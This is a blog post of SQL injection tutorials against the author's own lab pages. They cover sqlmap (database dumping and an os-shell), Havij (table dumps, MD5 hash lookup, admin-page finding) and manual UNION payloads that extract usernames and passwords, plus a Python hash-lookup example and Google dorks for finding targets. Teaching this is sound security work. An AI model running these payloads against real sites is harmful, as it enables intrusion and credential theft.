Posted on 2 Comments

SQL Injection with Sqlmap : Step by step guide

Hi Friends. Today we will see how to perform SQL injection with sqlmap. Sqlmap is an "open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers". It comes pre-installed in Kali Linux. For this tutorial I am using Vulnerawa as the target, so you need a webapp pentest lab with it set up. See how to set up a webapp pentest lab.

Once the webapp pentest lab is ready, open the browser in Kali Linux and type the address as shown below (the IP address may differ for you). You should see the Vulnerawa web page as shown below. Click on "About".

The page below will open. It lists the founders of Vulnerawa.

Click on "Founder 1". It shows brief details about him as shown below.

Similarly, go back and click on "Founder 2" and "Founder 3". The result is shown below. If you look at the URL, the "id" parameter changes as we click on different founders: 1 for Founder 1, 2 for Founder 2, and so on. A parameter that picks a database row like this is the classic place to test for injection.

Now add a single quote (') character to the URL right after the number, as shown below.

Press Enter and the page shows a database error as shown below ("You have an error ..."). The quote closed the string the application put the id into and left the rest of the query malformed. A database error surfacing like this is a strong sign that the parameter is injectable, and the verbose MySQL message also tells us which backend we are dealing with.

Now open sqlmap from the path shown below (it can also be started by typing sqlmap in a terminal).

Now copy the vulnerable URL and type the following command in the terminal. Here -u specifies the target URL; it must include the id parameter so that sqlmap knows which parameter to test.

The result is shown below. sqlmap confirms the injection and reports the web server, the server-side technology (PHP) and the backend DBMS.

Now let's grab the banner of the database server, i.e. its version string. Type the following command and press Enter.

You can see the banner below.

To see the database user the application connects as, type the following command.

The current user is shown below.

Now let us see the current database used by the website. Type the following command.

We can see that the current database is “Vulneraw”.

Now let us list all the tables in the database "Vulneraw" with the following command.

We see that we have only one table in the current database. The table is “users”.

Now let's list the columns of the table "users". Type the following command.

We see there are four columns in table “users”.

Now let's dump the values of the two columns username and password with the following command.

The result is below: we have the usernames and passwords.

If we want to dump all the entries of the table, type the following command.

Here are the entries.

Now let's see if we are lucky enough to get a shell on the target, i.e. a command prompt on the machine hosting the database. This only works when the database user is allowed to write files and a directory exists that both the database server can write to and the web server serves, because sqlmap plants a small web shell there. Type the following command.

It will prompt us for the server-side language the website uses. We already know it is PHP, so choose that. Next it prompts for a writable directory; choose wisely, since it must be writable by the database server and reachable through the web server. I chose the default root directory for WAMP server. Press Enter.

I successfully got the os-shell. Now let's try some commands. Type "dir" to list the contents of the root directory. It works as shown below.

Let's see how many user accounts exist on the system: type the command "net user". The users are listed below. Happy hacking practice.

Google dorks such as "site:.com inurl:id=1" turn up pages with this kind of parameter, but probing sites you are not authorized to test is illegal, so keep this to your own lab targets. That's all in this tutorial. See how SQL injection works.


SQL injection with Havij : Step by step guide

NOTE : This is strictly for educative purposes.

Havij is an automated SQL injection tool. To say it in the words of its creators,

” Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands. ”

It is available in both free and commercial versions. Today we are going to see how to dump the contents of a database using Havij; I am using the free version. First download Havij and install it. Then open it and enter the URL of the vulnerable page in the target field (for this tutorial I am using my own vulnerable webpage).

Set the database option to 'auto detect' and click Analyze. This should show you the current database name as shown below.

Click on the "Info" tab. This shows information about the target system, such as the host IP address and web server version.

Click on the “Tables” tab.

Click on “Get DBs” option. This will list all the databases as shown below.

To get the tables in a specific database, select the database and click on "Get Tables". This lists all the tables in the selected database. I selected the database "shunya" here.

We can see that there is one table, 'users', in our database 'shunya'. To get its columns, select the table 'users' and click on "Get Columns".

This lists all the columns in the table; we can see five columns in 'users'. It's time to dump the column values. Select the columns whose data you want and click on "Get Data". Here I selected all the columns.

We got all the data, including usernames and passwords. The passwords, though, are not stored in plain text: they are MD5 hashes. MD5 is a one-way hash, not encryption, so nothing is really "decrypted"; the tool looks the hash up against large sets of already-computed hashes of common passwords, which only succeeds when the password is in those sets. Click on the password hashes and copy them, then click on the "MD5" tab, paste the hash and click "Start". Havij finds the plaintext for us. Recover the other passwords in the same way.

Click on "Find Admin". This option searches for the site's admin login page automatically. When it finds one, try the recovered usernames and passwords to log in. Hope this was helpful.
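What the MD5 tab does is a lookup, not decryption. The following is an added example written for this page (not Havij's code) that shows the mechanism with Python's hashlib: it precomputes MD5 over a small constructed wordlist, matches the dumped hashes against that table, and then shows why a per-user salt makes such a table useless. The usernames, hashes and wordlist are made up for the example.

```python
import hashlib


def md5_hex(text):
    """Hex MD5 digest, the form password hashes appear in when dumped."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


# Constructed sample, not data from the page: a dumped password column. The
# first three are MD5 of "password", "123456" and "12345678"; the last is a
# strong password hashed here so that the lookup has something to miss.
DUMPED_HASHES = {
    "founder1": "5f4dcc3b5aa765d61d8327deb882cf99",
    "founder2": "e10adc3949ba59abbe56e057f20f883e",
    "founder3": "25d55ad283aa400af464c76d713c07ad",
    "admin": md5_hex("xK9#vq2!Lm8$wR"),
}

# Tiny stand-in for the word lists behind online MD5 lookup services.
WORDLIST = ["letmein", "password", "qwerty", "123456", "admin", "12345678"]


def build_lookup(words):
    """Precompute hash -> plaintext once. An 'MD5 decryptor' is this table,
    just much larger; nothing is reversed."""
    return {md5_hex(w): w for w in words}


def crack_unsalted(hashes_by_user, words):
    """One table serves every user and every site, because equal passwords
    give equal unsalted hashes. Unknown passwords come back as None."""
    table = build_lookup(words)
    return {user: table.get(h.lower()) for user, h in hashes_by_user.items()}


def crack_salted(salted_by_user, words):
    """With a per-user salt the precomputed table is useless: every candidate
    has to be hashed again for each user. (A slow hash such as bcrypt, scrypt
    or Argon2 is what makes that per-user work expensive; salting MD5 alone
    is not enough.)"""
    found = {}
    for user, (salt, h) in salted_by_user.items():
        found[user] = next((w for w in words if md5_hex(salt + w) == h), None)
    return found


if __name__ == "__main__":
    print(crack_unsalted(DUMPED_HASHES, WORDLIST))
    salted = {"founder1": ("9f3a", md5_hex("9f3a" + "password"))}
    print(crack_salted(salted, WORDLIST))
```

Running it recovers the three weak passwords and returns None for the admin hash, which is exactly the behaviour you see in Havij when a hash is not in its databases.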

Here’s a video version of this howto.


SQL Injection tutorial for beginners

There are many articles on the internet about SQL injection, but most of them only give you the queries and don't show the resulting output. So I have decided to write a SQL injection tutorial for beginners. For this I made my own webpage vulnerable to SQL injection and hosted it on WAMP server. I hope this helps beginners understand SQL injection.

Imagine a hacker searching for SQL-injectable sites with Google dorks lands on the website shown below.

The page above displays some information about the company's founders. What happens when we click on "Founder 1"? It displays some information about Founder 1, as shown below.

Notice the small change in the URL: it now ends in id=1. If we go back and click on "Founder 2", it displays information about Founder 2 and the URL changes to id=2. So the page reads the id from the query string (PHP's $_GET) and uses it to fetch a row from the database; if that value is pasted into the SQL query unescaped, we can inject our own SQL through it.

Let's see if the page is vulnerable. In the address bar, add a single quote after id=1, like below.

id=1'

If you get an error as shown above, the parameter is vulnerable to SQL injection: the quote closed the string literal around the id and broke the query. Knowing this, let's find the number of columns the vulnerable query selects, because a UNION later on has to match it. Use the query

id=1 order by 1 

and increase the value  until you get an error, like below.

id=1 order by 2

id=1 order by 3

The last value that does not produce an error is the number of columns. 'ORDER BY' normally sorts the result; given a number it sorts by that column position, and MySQL errors when the position is larger than the number of selected columns. Sometimes you see no error no matter how far you go, like the case below where I got none even at 15.

Perhaps there really are fifteen columns (unlikely), or, more probably, our injection is not reaching the query: if the application wraps the id in quotes, "1 order by 15" is just the contents of a string literal. So let's close that quote first.

id=1' order by 1--+

We can see below that the value 3 returns an error. This means there are two columns.

If this quoted form works, use it throughout the rest of the injection. The characters '--' start a comment in MySQL, which discards the remainder of the original query (including the application's own closing quote). MySQL requires whitespace after '--', and the '+' in the URL decodes to that space.

Now we know there are two columns. Let's find out which of them are displayed on the page. Type

id=-1' union select 1,2--+

The id -1 matches no row, so what the page shows is the UNION row: whichever of the numbers 1 and 2 appears on the page marks a column whose content is rendered, and that is where we will put our own expressions. Here both columns are displayed, but you may not be so lucky every time.

If the above query doesn’t work, use

id=1' and 1=2 union select 1,2--+

Now let's find out the database version. Since we know the column count, use the query

id=-1' union select version(),2--+

The version is 5.6.2-log. Now let's find out the names of all the databases on the server. Use the query

id=-1' union select group_concat(schema_name),2 from information_schema.schemata--+

This lists all the databases, as shown below; group_concat() joins them into one comma-separated string so that they fit in the single displayed column. You can see the dvwa database which I used earlier for practice.

We know all the databases. Now let's see which one our website uses. Use the query

id=-1' union select database(),2--+

So shunya is the database our website uses. Let's see the current user.

id=-1' union select user(),2--+

We know root is the default user on WAMP server. Now let's find the tables in the 'shunya' database.

id=-1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--+

The table name is 'users'. Now let's find the column names in the table 'users'.

id=-1' union select group_concat(column_name),2 from information_schema.columns where table_schema=database()--+

We got the column names. (This query lists the columns of every table in the current database, which is fine here because 'users' is the only one; with more tables, filter on the table name as well.) Now let's dump the values of the interesting columns, "username" and "password".

id=-1' union select group_concat(username,0x3a,password,0x3a),2 from users--+

We successfully dumped the usernames and passwords. 0x3a is the hex literal for ':' and puts a colon between the values for readability; writing it in hex means the payload needs no extra quote characters. Now let's dump all the values from the table 'users'.

id=-1' union select group_concat(id,0x3a,name,0x3a,field,0x3a,username,0x3a,password),2 from users--+

We have successfully performed SQL injection and dumped the values. That's all in this SQL injection tutorial for beginners. Now that you understand the basic concept of SQL injection, also see how to exploit SQL injection with Havij and sqlmap.